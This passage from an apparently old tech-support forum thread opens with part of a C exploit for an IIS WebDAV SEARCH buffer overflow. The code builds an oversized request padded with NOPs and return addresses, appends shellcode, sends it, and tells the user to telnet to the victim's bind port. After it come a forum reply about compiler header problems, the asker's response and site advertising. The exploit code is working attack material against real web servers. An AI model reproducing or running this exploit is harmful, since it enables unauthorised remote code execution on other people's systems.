((ret >> 8) & 0xff), ret & 0xff);

  bzero(buffer, MAXBUF);
  strcpy(buffer, "SEARCH /");
 
  i = strlen(buffer);
  buffer[i] = NOP;         // Align for RET overwrite

  // Normally, EIP will be overwritten with buffer[8+2087] but I prefer to fill
 
  for (j=i+1; j < i+2150; j+=2)
        *(unsigned short *)&buffer[j] = (unsigned short)ret;

  // The rest is padded with NOP's. RET address should point to this zone!
  for (; j < i+65535-strlen(jumpcode); j++)
        buffer[j] = NOP;

  // Then we skip the body of the HTTP request
  memcpy(&buffer[j], jumpcode, strlen(jumpcode));

  strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
  sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
  strcpy(buffer+strlen(buffer), body);
 
  // This byte is used to mark the beginning of the shellcode
  memset(buffer+strlen(buffer), 0x01, 1);
 
  // And finally, we land into our shellcode
  memset(buffer+strlen(buffer), NOP, 3);
  strcpy(buffer+strlen(buffer), shellcode);
 
  // Send request
  if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))
        {
          perror("Failed to send");
          exit(-7);
        }

  printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport);

  // Receive response
  while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)
        rt += r;
  // This code is not bullet-proof. An evil WWW server could return a response
  // and an overflow would occur here. Yes, I'm lazy... :-)
 
  buffer[rt] = '\0';
 
  if (rt > 0)
        printf("[*] Victim server issued the following %d bytes of response:\n--\n%s\n--\n[*] Server NOT vulnerable!\n", rt, buffer);
  else
    printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport);
 
  close(s);

}

0
 
LVL 6

Expert Comment

by:GaryFx
ID: 8247225
I just tried it on RedHat 6.1 with gcc 2.95.2.  I got no errors, though I did get unrelated warnings when I compiled it with -Wall.  

This suggests that the problem is with your .h include files.  Perhaps you're getting the wrong ones, or you don't have the right one, or some preprocessor symbol is misdefined.  It's difficult to say.  Personally, when I'm faced with such problems, I compile with -E which produces the result of the preprocessor.  This lets me see exactly which files are included and whether any sections are skipped due to preprocessor symbols.  But it is a tedious approach.

Gary
0
 

Author Comment

by:MtM
ID: 8249337
Well, that just pisses me off ;-)  I'll figure out how to get this stuff compiled sometime.

MtM
0

Featured Post

The Eight Noble Truths of Backup and Recovery

How can IT departments tackle the challenges of a Big Data world? This white paper provides a roadmap to success and helps companies ensure that all their data is safe and secure, no matter if it resides on-premise with physical or virtual machines or in the cloud.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

A Bare Metal Image backup allows for the restore of an entire system to a similar or dissimilar hardware. They are highly useful for migrations and disaster recovery. Bare Metal Image backups support Full and Incremental backups. Differential backup…
The Delta outage: 650 cancelled flights, more than 1200 delayed flights, thousands of frustrated customers, tens of millions of dollars in damages – plus untold reputational damage to one of the world’s most trusted airlines. All due to a catastroph…
This tutorial will walk an individual through locating and launching the BEUtility application to properly change the service account username and\or password in situation where it may be necessary or where the password has been inadvertently change…
This tutorial will walk an individual through the process of installing of Data Protection Manager on a server running Windows Server 2012 R2, including the prerequisites. Microsoft .Net 3.5 is required. To install this feature, go to Server Manager…
Suggested Courses

777 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question